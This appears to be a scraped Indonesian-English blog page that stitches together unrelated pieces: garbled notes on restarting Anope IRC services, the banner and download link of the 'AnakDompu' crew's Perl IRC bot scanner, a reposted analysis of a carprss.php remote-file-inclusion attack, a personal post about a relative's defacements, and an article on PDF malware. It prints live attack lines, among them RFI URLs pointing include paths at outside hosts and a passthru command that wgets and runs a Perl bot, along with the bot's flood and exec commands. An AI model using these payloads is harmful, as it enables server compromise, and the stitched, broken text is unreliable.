Restart Anope Services

After adding on modules and services anope to run modules that have been included in anope must restart the first to run the new modules.

OperServ is a bot that handles all of the issues both modules to run or disable modules

Can me restart anope Services are services where the services administrator root root administrator is already on settingan services.conf on anope.

VhostServ modules only run on anope1.7.21

Anope Bot Services List :

NickServ - nickname management services. NickServ allows your users to register their nickname to prevent others from stealing their nickname. Your users will also be able to kill any ghost connections with their nickname and will be able to group their most-used nicknames together so they can use the same set of settings and access for all of their nicknames.

ChanServ - channel management services. ChanServ provides the ability to register your channels. This way ChanServ can be used to give channel operator status to regular operators, or to lock other modes or a topic for your channel. Our version of ChanServ provides a very complete set of features for channel management, allowing complete control over your channel.

MemoServ - send memos to users or channels. MemoServ offers a way to send short messages to users who are currently offline, or to entire channels if you wish. This allows you and your users to quickly tell offline users something, without a chance of forgetting it.

OperServ - operator utility services. OperServ provides a very complete set of functionality for IRC Operators, allowing them to operate their network in a very efficient way. Including often used features like akills and session limiting, this black box for IRC Operators ensures a safe and easy to manage IRC network.

BotServ - channel bot services. BotServ allows you to create several bots for your network. These bots can join channels and take over most actions from ChanServ, making things just a tad more intuitive. Additionally, BotServ also adds a few features like fantasy commands and kick triggers.

HostServ - virtual host services. HostServ offers a way to easily provide virtual hosts to the users on your network. If your IRCd supports virtual hosts HostServ can be used as a very easy interface for setting them, and enables the virtual host every time a user joins the network.

-OperServ- End of users list.
-
-OperServ- Access denied.
-
* Your nick is now FuRkaN
-
-NickServ- This nickname is registered and protected. If it is your
-
-NickServ- nick, type /msg NickServ IDENTIFY password. Otherwise,
-
-NickServ- please choose a different nick.
-
-NickServ- Password accepted - you are now recognized.
-
-HostServ- Your vhost of Shinchi.Memang.C-a-K-e-p.Co.Cc is now activated.
-
-Irc.Shinchi.Co.Cc- *** LocOps -- Received SQUIT services.Shinchi.Co.Cc from services.Shinchi.Co.Cc[xXx.xX.Xx.X] (RESTART command received from FuRkaN)
-
Irc.Shinchi.Co.Cc (1) 100
`-Irc.Defacer.biz (26) 1
End of /MAP
-
-Irc.Shinchi.Co.Cc- *** Notice -- (link) Link Irc.Shinchi.Co.Cc -> services.Shinchi.Co.Cc[@xXx.xX.Xx.X.1984] established
-
-Irc.Shinchi.Co.Cc- *** Notice -- Link services.Shinchi.Co.Cc -> Irc.Shinchi.Co.Cc is now synced [secs: 10 recv: 2.345 sent: 11.115]
-
Irc.Shinchi.Co.Cc (1) 100
|-services.Shinchi.Co.Cc (10)
`-Irc.Defacer.biz (26) 1
End of /MAP

Bot IRC Perl Scanner

#!/usr/bin/perl
#
########################################################
# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata
# Anak
#       _____
#      ( ___ )  _____  __  ___  ____  _   _
#      | |  \ \(  _  )(  \/   )( _  )( ) ( )
# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu
#  ////| |   | ) | | || |\/ | || ___)| | | | /  crew
#      | |__/ /| (_) || |   | || |   | |_| |
#      (_____) (_____)(_)   (_)(_)   (_____)
#
#              AnakDompu [on] Dalnet © 2008
#
#
########################################################


use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
##################################################
# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata™  #
#    www.AnakDompu.by.ru     #
#      Created By Shinchi    #
#   #AnakDompu    #
#  irc.dal.net    #
##################################################

Download

file from : http://sunjester.freepgs.com/codebase/codes/Perl_scanner.txt

Found carprss.php Exploit

Since 29 February, this blog was hit by 400+ attempts to compromize the server and install an IRC bot. There is a new exploit of SiteBuilder in the wild. Hits came from the following compromized hosts:

# awk '{ print $1 }' 

Bad hits look like:

GET /tag//files/carprss.php?CarpPath=http://216.191.16.12/ \
    .shell/site/iyes.txt??

I downloaded the file iyest.txt, it’s a PHP script which contains lot of lines such:

@passthru('cd /tmp;wget http://216.191.16.12/.shell/site/ \
    hai.txt;perl hai.txt;rm -f hai.txt*');

This IP address belongs to AllStream, a Canadian Internet provider.
After a successful download via the URL above, the code is parsed and executed by carprss.php. I downloaded hai.txt. It’s a Perl script which performs several tasks:

#!/usr/bin/perl
#
########################################################
# Ketika Rasa Tak Dapat Di Ungkap Dengan Kata
#       Anak
#       _____
#      ( ___ )  _____  __  ___  ____  _   _
#      | |  \ \(  _  )(  \/   )( _  )( ) ( )
# _\\\\|_|_ _|_)_(_)_||_\__/|_||_|)_||_|_|_|_\ AnakDompu
#  ////| |   | ) | | || |\/ | || ___)| | | | /  crew
#      | |__/ /| (_) || |   | || |   | |_| |
#      (_____) (_____)(_)   (_)(_)   (_____)
#
#              AnakDompu [on] Dalnet © 2008
#
#
########################################################

It set up an IRC bot which try to connect to 61.246.177.225:65500 and join channel #d0s:

# telnet 61.246.177.225 65500
Trying 61.246.177.225...
Connected to 61.246.177.225.
Escape character is '^]'.
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Looking up your hostname...
:irc.Indonesia.B0tN3t.org NOTICE AUTH :*** Found your hostname

This IP address belongs to AirTel, an Internet provider in New-Delhi.

The bot understands the following commands: “user”, “restart”, “mail”, “safe”, “inbox”, “conback”, “dns”, “info”, “vunl”, “bot”, “uname”, “rndnick”, “raw”, “eval”, “sexec”, “exec”, “passthru”, “popen”, “system”, “pscan”, “ud.server”, “download”, “die”, “logout”, “udpflood”, “tcpflood”.

How to avoid this kind of attack? First, run patched software! But how to prevent them?

• Do not run public servers with administrative right (root).
• Run the servers in a chroot’d environment.
• Do not allow outgoing to unusual ports (65500 in this case).
• Use ACL systems to prevent the servers to executre or access to unusual files or directories. [1]
• Run an selinux on Linux or systrace on *BSD.

  I do not publish the scripts here but I kept a copy of them. Ask me if you need to have a look at it “for study only”. If you have more information, let share them!

Source From : http://blog.rootshell.be

AnakDompu Apaan Seh?

On 5/12/08, Micha** **** **** wrote:

Micha** **** **** wrote:
>
> Dear Mr. P*****A a.k.a Black_Claw a.k.a blaxnux,
> we would like to ask you a few details, about a group
> known as “AnakDompu”, which is somehow related to you.
> As you can also find in google, “AnakDompu” crew are
> are famous for web attacking most of russia and china site for
> past 6 months,including goverment sites. We are not
> judging since it is still unclear about it yet since
> the attacker IP seems diffrent from yours, but it is
> no doubt that the nick that you use are cleary seen
> on the hacked page. It maybe just a same handle, but
> during research, we also found that a few words also
> lead us to you. We hope that this is just a
> missunderstanding and we wait for your reply.
>
>
> Sincerely,
> Micha** **** ****

Loh, ada apa ini? Perasaan saya pernah denger masalah AnakDompu ini tapi dimana ya? Setahu saya hal yang berkaitan dengan AnakDompu ini adalah akun wotpres Rhakateza disaspen kemarin. Maka saya googling sajalah, dan saya menemukan ini :

Korespondensi Perusahaan
Nama: Tn. Furkan [Direktur/CEO/Manajer Umum]
E-mail:
Situs Web: http://anakdompu.blogspot.com
Pesan Instan

Nomer Telpon: 081804297445
Nomer Faks: —
Alamat: Jln. Merpati no 47 Dompu NTB
Dompu, Nusa Tenggara Barat
Indonesia

Sifat Dasar Usaha Jasa dari kategori Komputer & Software

Penjelasan Ringkas

AnakDompu merupakan Nama Sebuah Komunitas Yang Berasal Dari Dompu Nusa Tenggara Barat
AnakDompu Bergerak Dalam Bidang Teknologi Informasi. Merupakan Suatu Komunitas Yang di dalamnya terdapat Berbagai macam Suku Dan KOmunitas yang terpentuk Dengan Nama AnakDompu

Lah, ini sejak kapan si Ukang bikin perusahaan? Direktur pulak! Lah, tapi masak ini penyebabnya itu imel nowel-nowel saya. Kan tidak masuk akal. Tapi kemudian saya nemu yang ini :

http://cgaprogram.com/images/dompucrew.html

#AnakDompu @Dalnet 2008

AnakDompu

Greets

Shinchi, Black_Claw, silverx, Rhakateza, ab-enk, onny, [E]mine[M], Artexdabox , JaLi-, O_L_O, Slack-ware, jok3rsmd, H4ntu_Cyber, BeRgUnDaL, And All AnakDompu Crew

Special Thank’s to :

All Crew Chan : #AnakBatam, #sysHACK, #powHACK, #CR@CKER, #e-c-h-o, #yogyafree, #becak, #kuburan, #24jam, #jepang, #0-9

Kemudian yang ini :

http://www.matchent.com/wpress/?q=node/267

A bit better regarding the file cmd.txt which got a score of 11/32.
ClamAV calls this one PHP.Shell
I found one little piece of code in one of the files:
echo “AnakDompu“;
Which apparently leads to some Indonesian guys.
So I am a bit in doubt about who these guys are; Albanians, Russians, Turks or Indonesians?
AnakDompu gives some hits to pages apparently related to hacking, e.g. http://shinchi.wordpress.com/ , http://samada.wordpress.com/ , http://anakdompu.blogspot.com/ and http://anakdompu.wordpress.com/. And irc-channels on IndoIRC and DALnet.
l33t scriptkiddies who ruin other sites for fun? I think those days are over and most attacks nowadays are economically motivated.
It’s a dangerous world.

WTF! UKANG!!! Lah apa yang saya ajarkan dulu memangnya? Saya kira setelah nick Shinchi berhenti ngejar target nama di zone H semuanya sudah usai. Ternyata kok masih sama saja.
Lah macam ini seh malah menjelekkan nama daerah bapakmu namanya ndul. Cobak itu diselami kata-kata tuduhannya: “l33t scriptkiddies who ruin other sites for fun?” - “anak kecil nyekrip l33t yang menghancurkan situs demi kesenangan?”, dan lebih dari itu, saya dimasukkan dalam kategori tersebut karna saya “some Indonesian guys”? Aduhai, mohon maaf, sepertinya sudah lebih dari semilenium saya ninggalin yang namanya operasi plastik muka orang terus ditempelin nama saya buat senang-senang doang.

Saya memang nggak suci-suci amat dan ilmu saya jauh dibawah orang lain, tapi mbok ya setidaknya yang seperti itu tidak usah terlalu diumbarlah. Sudah cukup kegiatan corat-coret ini. Kalau kayak begini ya sampek hari kiamat juga yang kamu tau cuman RFI, LFI, sama EsKiEl. Kapan dewasanya? Masih banyak cara untuk mengangkat nama -atau mungkin di kasus kamu nama daerah- dengan cara yang lebih keren. Aktif di pengembangan opensors misalnya. Cobak walaupun kamu sama Ivan masih nguliah di jogja, bantulah saya gimana caranya supaya rotsow bisa kejadian di Dompu kek.

Tidak heran blog kamu disuspen, beserta semua yang lain yang ada di wotpres. Makanya baca itu TOA, nak. Baru kali ini saya melihat ada orang yang tega-teganya makek wotpres gretong untuk Remot Fail Inklusyen :

claroline/inc/claro_init_header.
inc.php?includePath=http://anakdompu.files.wordpress.com/2008/03/special.txt?

Ah, tapi kadang lucu juga melihatnya. Dompu, sebuah tempat fakir benwit yang bahkan nggak masuk di peta, yang dipandang rendah bahkan oleh kabupaten lain yang se-propinsi, bisa wira-wiri di kancah benwit kelas berat, dan parahnya, untuk bidang yang kurang baik pula…

Saya sering melihat langit Dompu dikala malam, jika tidak ada awan, jika langit tidak ditutupi apapun. Saya bisa melihat bintang. Saya bisa melihat horison. Saya kadang bahkan bisa menangkap kabut galaksi. Hal-hal yang sangat susah ditemui di langit di pulau Jawa. Membuat jika saya menyiulkan konserto eyecatch dari One More Time, One More Chance nya Byousoku 5cm, serasa daun mangga berubah menjadi kelopak bunga sakura yang jatuh bagaikan salju dengan kecepatan 5 sentimeter per detik…

Jadi kenapa harus memperburuk nama daerah yang bernaung dibawah langit seindah itu?

Source from : http://blackclaw.wordpress.com

Sisi gelap bulan

Laporan terakhir menunjukkan bahwa sampai pertengahan pertama tahun 2007 spam telah mencapai 59% dari semua lalu lintas email yang diawasi, suatu peningkatan yang spesifik dibandingkan dengan 54% pada kuarter 4 tahun 2006 kemarin.

0,68% dari email spam ini berpotensi mengandung ancaman payload, dalam wujud malicious attachment, yang mewakili sebuah serangan berbasis malware pada tiap 140 email spam yang terkirim.

Sejak beberapa tahun, cracker dan organisasi kriminal yang beroperasi pada ruang digital tengah menggunakan perpaduan antara social engineering dan teknik eksploitasi software.

Perpaduan ini menjadi semakin efektif, agresif dan semakin berbahaya dari waktu ke waktu, juga sangat menguntungkan, sehingga kita sekarang menyaksikan sebuah pasar global malware pesanan dan perangkat untuk kriminalitas, berkembang semakin pesat tiap hari.

Mengirimkan malicious attachment dengan email adalah sebagian besar bentuk penginfeksian yang paling umum, karena sangat mudah mengeksploitasi kelemahan email klien, dan juga karena end-user tidak bisa bekerja sama, terlihat ketidakmampuan untuk pencegahan dan memanage serangan semacam ini.

Bulan lalu, statistik menunjukkan pertumbuhan penggunaan attachemnt PDF yang dimodifikasi sebagai salah satu cara untuk menyebarkan trojan horse: serangan ini pernah sukses, secara keseluruhan, dalam kaitan dengan overlap dan penguatan konsekwensi dari beberapa penyebab berbeda:

- acrobat reader biasanya dianggap sebuah aplikasi yang aman dan dibutuhkan, oleh karena itu diijinkan secara default bahkan di komputer perusahaan

- acrobat reader dieksploitasi dengan mengambil keuntungan dari kelemahan yang pada umumnya masih 0-day, belum diberitakan, atau belum diperbaiki oleh vendor

- pengguna "percaya" dengan file PDF, dan telah menjadi kebutuhan, berasal dari sumber terpercaya, yang dengan mudah terkesan "PDF = dokumen resmi"

- sebuah serangan berbasis PDF bisa juga mengeksploitasi pengguna pada level semantik, dan dapat menguatkan sebuah scam berbasis social engineering, oleh karena kepercayaan yang dimiliki pada mereka, terutama saat mereka terlihat resmi (ditulis dengan baik, dokumen kelihatan profesional, mendiskusikan topik menarik / serius)

Perlindungan terhadap serangan semacam ini dapat diperoleh hanya jika, atau lebih baik saat, pemakai akhir (end-user) menjadi bagian dari rantai keamanan, yang dengan aktif bekerjasama di semua tindakan pencegahan, dari pencegahan sampai reaksi balasan. Satu-Satunya cara untuk mencapai gol ini adalah dengan membuat mereka bertanggung jawab jika sesuatu yang buruk terjadi, atau bisa telah terjadi karena kesalahan perilaku mereka.

Jika kita ingin meningkatkan level keamanan tersebut, kita harus keluar dari gagasan usang bahwa end-user adalah kebanyakan tidak mengerti, tidak suka menolong, anggota tidak aktif dari organisasi mereka. Seperti tiap sopir kendaraan tahu, tidak butuh menjadi montir untuk mampu mengemudi dengan aman: dengan menghormati beberapa aturan dasar yang dapat menghemat uang, menyelamatkan hidup, dan masalah, setiap orang berperilaku dengan tertib, untuk minat mereka sendiri.

Diperlukan pemindahan ongkos dan tanggung jawab proses keamanan ke arah pemakai akhir, dengan memperkenalkan peraturan yang sesuai, sanksi, dan menguatkan minat pribadi mereka dalam jalur yang lebih aman, pada tiap levelnya. Keamanan ICT tidak akan pernah mencapai yang lebih baik, jika kita tidak dengan aktif melibatkan pemakai akhir di dalam lingkaran. Permasalahan muncul bukan karena kurangnya kesadaran dan pendidikan, tetapi karena kurangnya keterlibatan dan rasa tanggung jawab.

Ini merupakan suatu topik yang luas, menarik, dan panas yang akan menjadi perdebatan bertahun-tahun, sehingga kami hanya dapat membawanya ke hadapan anda untuk diskusi lebih lanjut: tetapi menyangkalnya akan seperti menyangkal adanya sisi gelap dari bulan.

sumber : http://id.zone-h.org